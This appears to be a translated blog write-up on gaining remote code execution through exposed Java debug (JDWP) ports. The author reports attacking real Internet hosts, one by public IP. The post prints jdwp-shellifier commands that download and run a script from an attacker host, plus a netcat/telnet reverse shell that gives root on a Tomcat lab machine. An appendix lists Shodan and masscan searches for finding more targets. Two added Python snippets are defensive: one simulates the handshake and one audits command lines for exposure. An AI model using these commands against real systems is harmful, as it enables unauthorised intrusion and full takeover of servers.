Attempting code execution against hosts with an exposed JDWP port
Several JDWP ports were found open on the public Internet. First tried the Metasploit module: https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger
It did not succeed. The nmap script https://nmap.org/nsedoc/scripts/jdwp-exec.html did not succeed either. According to the write-up on the exploitation script used below, the nmap script fails because it uses hard-coded sizes.
Then tried the method from this paper:
https://www.exploit-db.com/papers/27179/
It says: find a method, set a breakpoint on it, and then you can run
print new java.lang.Runtime.exec("date");
but I never managed to get that to work.
After reading up on JDWP, attaching with
jdb -attach IP:PORT
shows some information about the server,
but I did not know how to go any further from there.
The JDWP protocol
Before JDWP (Java Debug Wire Protocol) communication can begin, a handshake is required: the client (the debugger) sends the 14-character ASCII string "JDWP-Handshake",
and the server (the debuggee) replies with the same string, which completes the handshake.
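The handshake described above, reproduced over a local socketpair as an added example (not code from this post or from jdwp-shellifier): one side plays the debugger, the other the debuggee, and a constructed non-JDWP listener shows how the check fails against anything that does not echo the 14 bytes. The same byte string is what a packet capture or an IDS rule would match to spot a debugger attaching over the network.

```python
import socket
import threading

HANDSHAKE = b"JDWP-Handshake"  # the 14 ASCII bytes; the debuggee must echo them back verbatim


def recv_exact(sock, n, timeout=2.0):
    """Read up to n bytes, stopping early on EOF or timeout."""
    sock.settimeout(timeout)
    buf = b""
    try:
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                break
            buf += chunk
    except socket.timeout:
        pass
    return buf


def debugger_handshake(sock):
    """Debugger side: send the magic string, succeed only if it comes back unchanged."""
    sock.sendall(HANDSHAKE)
    return recv_exact(sock, len(HANDSHAKE)) == HANDSHAKE


def debuggee_respond(sock):
    """Debuggee side, as the JVM's jdwp agent behaves: echo the string if it matches, else drop."""
    if recv_exact(sock, len(HANDSHAKE)) == HANDSHAKE:
        sock.sendall(HANDSHAKE)
    sock.close()


def other_service_respond(sock):
    """A constructed non-JDWP listener that answers with an HTTP-style banner instead."""
    recv_exact(sock, len(HANDSHAKE))
    sock.sendall(b"HTTP/1.1 400 Bad Request\r\n")
    sock.close()


def run_exchange(responder):
    """Run one handshake over a local socketpair so the exchange is reproducible offline."""
    client, server = socket.socketpair()
    t = threading.Thread(target=responder, args=(server,))
    t.start()
    ok = debugger_handshake(client)
    t.join()
    client.close()
    return ok
```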
Code execution with jdwp-shellifier
Exploitation script (it aims to turn an exposed JDWP port into reliable code execution):
https://github.com/IOActive/jdwp-shellifier
How the script works: https://ioactive.com/hacking-java-debug-wire-protocol-or-how/
ping executed successfully.
A DNS log service can also be used for the check: http://dnsbin.zhack.ca
A Wireshark capture shows the following:
Reverse shell
I did not look at the method below closely at the time; by the time I came back to it, the port had been closed. [facepalm]
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd 'chmod a+x /tmp/shell.sh'
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd '/tmp/shell.sh'
Contents of shell.txt (two ports are needed: one to send commands and one to receive the command output):
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
Reference: Polycom RSS4000 enables the JDWP port by default, leading to system command execution
Setting up a test environment
Starting Tomcat in debug mode on Ubuntu
All it takes is:
sudo ./bin/catalina.sh jpda start
Check the full command line of Tomcat running in debug mode:
ps aux|grep java
root 73856 0.2 4.6 2520612 94212 pts/4 Sl 20:43 0:09 /usr/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -agentlib:jdwp=transport=dt_socket,address=8000,server=y,suspend=n -Djava.endorsed.dirs=/opt/tomcat/endorsed -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
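The command line above shows why this instance is reachable from other hosts: the agent runs with server=y and address=8000 with no host part, which on JDK 8 and earlier binds every interface (from JDK 9 a bare port binds to localhost only). As an added audit example (not from this post or Tomcat), the hypothetical audit_jdwp() below parses a JVM command line as printed by ps aux, extracts the jdwp options from either -agentlib:jdwp= or the older -Xrunjdwp: form, and reports whether the debug listener is exposed; the sample command line is a constructed copy of the one above.

```python
import re
import shlex

# Constructed sample, modelled on the Tomcat command line shown above (JDK 8).
SAMPLE_CMDLINE = (
    "/usr/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties "
    "-agentlib:jdwp=transport=dt_socket,address=8000,server=y,suspend=n "
    "-classpath /opt/tomcat/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start"
)

LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def jdwp_options(cmdline):
    """Return the jdwp agent options as a dict, or None when the JVM has no jdwp agent.
    Handles both spellings: -agentlib:jdwp=... and the older -Xrunjdwp:...
    """
    for arg in shlex.split(cmdline):
        m = re.match(r"^-(?:agentlib:jdwp=|Xrunjdwp:)(.*)$", arg)
        if m:
            return dict(kv.partition("=")[::2] for kv in m.group(1).split(","))
    return None


def audit_jdwp(cmdline, jdk_major=8):
    """Classify a JVM command line: is a JDWP listener reachable from other hosts?"""
    opts = jdwp_options(cmdline)
    if opts is None:
        return {"jdwp": False, "exposed": False, "reason": "no jdwp agent"}
    if opts.get("server") != "y" or opts.get("transport") != "dt_socket":
        return {"jdwp": True, "exposed": False, "reason": "agent does not listen on a socket"}
    host, sep, port = opts.get("address", "").rpartition(":")
    if not sep:
        # Bare port: JDK 8 and earlier bind every interface, JDK 9+ default to localhost
        host = "" if jdk_major < 9 else "localhost"
    host = host.strip("[]")
    if host in LOOPBACK:
        return {"jdwp": True, "exposed": False, "port": port, "reason": "bound to loopback only"}
    return {"jdwp": True, "exposed": True, "port": port,
            "reason": "listens on %s:%s for unauthenticated debugger connections" % (host or "*", port)}
```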
Connecting to Tomcat in debug mode with jdb from Windows
Using the default jdb -attach IP:PORT form first, the connection failed to start.
Searching for the error message shmemBase_attach failed
led to an answer:
https://community.oracle.com/thread/1177940
On Windows jdb uses the shared memory transport by default,
with the connector com.sun.jdi.SharedMemoryAttach;
to connect over a socket, i.e. to debug over the network, jdb must be told to use the socket attaching connector.
The available connectors can be listed with:
jdb -listconnectors|findstr 连接器
Full command reference: http://www.herongyang.com/Java-Tools/jdb-Debug-Java-Application-Remotely.html
Finally, connecting with
jdb -connect com.sun.jdi.SocketAttach:hostname=192.168.96.129,port=8000
succeeded.
What I find puzzling is: jdb can connect, so why does my own plain TCP connection test get actively refused?
This matches what I saw with the vulnerable host tested earlier: netcat could only occasionally connect, while jdb -connect always could.
Next, test whether the script can be used for exploitation.
The process is as follows:
First start two netcat listeners on Windows, on ports 1111 and 3333:
ncat -l 1111
ncat -l 3333
These are for the reverse shell later on.
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd 'wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=882
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0x968
[+] Selected payload 'wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh'
[+] Command string object created id:969
[+] Runtime.getRuntime() returned context id:0x96a
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=96b
[!] Command successfully executed
? jdwp-shellifier git:(master) cat /tmp/shell.sh
nc 192.168.96.1 1111 | /bin/bash | nc 192.168.96.1 3333%
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd 'chmod a+x /tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=947
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0xa32
[+] Selected payload 'chmod a+x /tmp/shell.sh'
[+] Command string object created id:a33
[+] Runtime.getRuntime() returned context id:0xa34
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=a35
[!] Command successfully executed
? jdwp-shellifier git:(master) ll /tmp/shell.sh
-rwxr-xr-x 1 root root 55 Oct 18 20:03 /tmp/shell.sh*
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd '/tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=947
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0xa32
[+] Selected payload '/tmp/shell.sh'
[+] Command string object created id:a33
[+] Runtime.getRuntime() returned context id:0xa34
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=a35
[!] Command successfully executed
The reverse shell after the connection succeeds: since Tomcat was started with sudo, the shell obtained here runs as root.
The whole procedure:
Ubuntu (JDWP enabled)
sudo netstat -plnt|grep 8000
sudo ./bin/catalina.sh jpda start
sudo netstat -plnt|grep 8000
Windows (attacker)
Exploitation script: https://github.com/IOActive/jdwp-shellifier
Start the netcat listeners
ncat -vl 1111(cmd1)
ncat -vl 3333(cmd2)
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "chmod a+x /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh"
Appendix
- Search GitHub for recently updated code containing -Xdebug -Xrunjdwp: https://github.com/search?o=desc&q=-Xdebug+-Xrunjdwp&s=indexed&type=Code
- Search Shodan for JDWP services: https://www.shodan.io/search?query=JDWP-HANDSHAKE
- Fast Internet-wide port scanner: https://github.com/robertdavidgraham/masscan